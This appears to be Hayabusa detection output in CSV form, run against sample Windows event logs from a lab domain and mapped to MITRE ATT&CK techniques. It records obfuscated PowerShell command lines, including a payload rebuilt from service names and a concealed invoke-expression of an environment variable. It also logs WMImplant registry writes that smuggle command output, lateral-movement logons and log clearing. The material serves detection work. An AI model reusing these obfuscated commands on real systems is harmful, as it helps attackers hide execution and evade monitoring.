+2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process:  | Target Server: cifs/fs03vuln.offsec.lan,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx
+2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
